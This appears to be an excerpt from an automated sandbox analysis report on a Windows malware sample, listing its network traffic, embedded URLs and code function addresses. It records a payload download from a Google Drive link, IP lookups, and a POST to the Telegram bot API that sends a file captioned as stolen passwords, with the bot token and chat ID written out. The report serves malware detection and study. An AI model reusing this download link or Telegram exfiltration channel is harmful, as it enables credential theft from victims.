            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49747 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318086900029Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035934000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035A55000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035934000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035A55000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: ppISxhDcpF.exe, 00000005.00000002.2736621144.0000000037F8E000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000356D1000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2736621144.0000000037F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: ppISxhDcpF.exe, 00000005.00000002.2736621144.0000000037F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/0(
            Source: ppISxhDcpF.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000356D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035934000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035A55000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: ppISxhDcpF.exe, 00000005.00000002.2713551254.0000000005098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/c
            Source: ppISxhDcpF.exe, 00000005.00000002.2713551254.0000000005098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
            Source: ppISxhDcpF.exe, 00000005.00000002.2713949369.0000000006C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2
            Source: ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2)i
            Source: ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2Gh$
            Source: ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.coml
            Source: ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2153669681.0000000005106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/:
            Source: ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2153669681.0000000005106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/E
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2153669681.0000000005106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1x9DSfok3BU85kiqweJ7pgJp2Rx3of5t2&export=download
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.00000000050FA000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: ppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49775 version: TLS 1.2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_004032A0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_004070415_2_00407041
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_0040686A5_2_0040686A
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_00404B305_2_00404B30
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_001560E05_2_001560E0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_001543485_2_00154348
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_00158DF85_2_00158DF8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_001559785_2_00155978
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_001543295_2_00154329
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_380178485_2_38017848
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_380158765_2_38015876
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801331A5_2_3801331A
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_380103AF5_2_380103AF
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801CCA05_2_3801CCA0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801C6385_2_3801C638
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801F05A5_2_3801F05A
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801B07F5_2_3801B07F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801B9305_2_3801B930
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801C1F25_2_3801C1F2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801DA895_2_3801DA89
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801E3395_2_3801E339
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801E3475_2_3801E347
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801EBF25_2_3801EBF2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801CCA25_2_3801CCA2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801B4F25_2_3801B4F2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801BDA25_2_3801BDA2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_380176285_2_38017628
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_38016E915_2_38016E91
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_38016EA05_2_38016EA0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801DEE15_2_3801DEE1
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_38017F605_2_38017F60
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801E7905_2_3801E790
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_3801E79F5_2_3801E79F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BA9B05_2_384BA9B0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BBA885_2_384BBA88
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BA3605_2_384BA360
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B9D105_2_384B9D10
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BBDF05_2_384BBDF0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B86505_2_384B8650
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B96C85_2_384B96C8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B18485_2_384B1848
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B00405_2_384B0040
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B18585_2_384B1858
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B70615_2_384B7061
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B70705_2_384B7070
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B48205_2_384B4820
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B20F85_2_384B20F8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B21085_2_384B2108
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BF1285_2_384BF128
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BF1305_2_384BF130
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B51F85_2_384B51F8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BA9A05_2_384BA9A0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B29B85_2_384B29B8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B32585_2_384B3258
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B32685_2_384B3268
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B52085_2_384B5208
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BBA975_2_384BBA97
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B5AA85_2_384B5AA8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B5AB85_2_384B5AB8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B7B4F5_2_384B7B4F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B63585_2_384B6358
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BA3525_2_384BA352
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B63685_2_384B6368
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B3B085_2_384B3B08
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B3B185_2_384B3B18
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B43C85_2_384B43C8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B6C095_2_384B6C09
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B14005_2_384B1400
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B6C185_2_384B6C18
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B74C85_2_384B74C8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B1CA05_2_384B1CA0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B74B85_2_384B74B8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B1CB05_2_384B1CB0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B255F5_2_384B255F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B25505_2_384B2550
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B25605_2_384B2560
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B9D005_2_384B9D00
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B4DB25_2_384B4DB2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B4DB05_2_384B4DB0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B86405_2_384B8640
